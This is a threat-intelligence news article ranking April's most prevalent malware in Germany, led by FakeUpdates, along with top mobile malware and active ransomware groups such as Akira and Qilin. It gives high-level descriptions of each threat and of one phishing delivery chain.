Malware Rankings for April: FakeUpdates Remains the Dominant Malware in Germany

Security researchers have uncovered a sophisticated multi-stage malware campaign distributing AgentTesla, Remcos, and Xloader. The attack begins with phishing emails disguised as order confirmations, tricking victims into opening a malicious 7-Zip archive. This archive contains a JScript-encrypted (.JSE) file that launches a Base64-encoded PowerShell script. This script then executes a second-stage .NET or AutoIt-based executable. The final malware payload is injected into legitimate Windows processes such as RegAsm.exe or RegSvcs.exe, significantly enhancing its stealth and ability to evade detection.

These findings reflect a striking trend in cybercrime: the convergence of commercially available malware and advanced techniques. Tools like AgentTesla and Remcos, once openly and cheaply sold, are now integrated into complex delivery chains that mimic the tactics of state-sponsored actors, blurring the lines between financially and politically motivated threats.

Top Malware in Germany

The arrows indicate changes in ranking compared to the previous month.

↔ FakeUpdates (3.35%)
FakeUpdates, also known as SocGholish, is a downloader malware first discovered in 2018. It is spread via drive-by downloads on compromised or malicious websites and prompts users to install a fake browser update. FakeUpdates has been linked to the Russian hacker group Evil Corp and is used to deliver various secondary payloads after the initial infection.

↑ Remcos (2.69%)
Remcos is a Remote Access Trojan (RAT) first identified in 2016. It is commonly spread through malicious documents in phishing campaigns. Designed to bypass Windows security features such as User Account Control (UAC), it executes malware with elevated privileges, making it a versatile tool for attackers.

↓ Androxgh0st (2.43%)
AndroxGh0st is a Python-based malware that targets applications using the Laravel PHP framework. It scans for unprotected .env files that contain sensitive data such as credentials for AWS, Twilio, Office 365, and SendGrid. The malware uses a botnet to identify websites running Laravel and steals confidential information. Once access is gained, attackers can deploy additional malware, establish backdoor connections, and exploit cloud resources for activities such as cryptocurrency mining.

Top Mobile Malware

↔ Anubis
Anubis is a versatile banking Trojan originally developed for Android devices, now equipped with advanced features like bypassing multi-factor authentication (MFA) by intercepting SMS one-time passwords (OTPs), keylogging, audio recording, and ransomware capabilities. It is often distributed through fraudulent apps on the Google Play Store and has become one of the most widespread mobile malware families. Anubis also includes various RAT (Remote Access Trojan) functionalities, enabling extensive surveillance and control of infected systems.

↔ AhMyth
AhMyth is a remote access trojan (RAT) targeting Android devices, typically masquerading as legitimate apps such as screen recorders, games, or cryptocurrency tools. Once installed, it gains extensive permissions, allowing it to persist after a reboot and steal sensitive data including banking details, cryptocurrency wallet credentials, MFA codes, and passwords. AhMyth also supports keylogging, screen capture, access to the camera and microphone, and SMS interception, making it a powerful tool for data theft and other criminal activity.

↑ Hydra
Hydra is a banking Trojan designed to steal banking credentials by prompting victims to grant dangerous permissions every time they open a banking app.

Most Active Ransomware Groups

1. Akira
   First reported in early 2023, Akira ransomware targets both Windows and Linux systems. It uses symmetric encryption with CryptGenRandom() and ChaCha 2008 to encrypt files and shares similarities with the leaked Conti v2 ransomware. Akira is spread through various vectors, including infected email attachments and exploits in VPN endpoints. After infection, it encrypts data and appends the extension “.akira” to filenames. A ransom note is then displayed, demanding payment in exchange for decryption.

2. SatanLock
   SatanLock is a new operation that has been publicly active since early April. It has disclosed 67 victims, although, as with many new players, over 65% of these had previously been targeted by other actors.

3. Qilin
   Also known as Agenda, Qilin is a criminal ransomware-as-a-service operation that collaborates with affiliates to encrypt and steal data from compromised organizations, demanding a ransom for decryption. First discovered in July 2022, this ransomware is developed in Golang and is known for targeting large enterprises and high-value organizations, particularly in the healthcare and education sectors. Qilin typically gains access via phishing emails containing malicious links, enabling it to infiltrate networks and exfiltrate sensitive data. Once inside, it moves laterally through the victim’s infrastructure in search of valuable data to encrypt.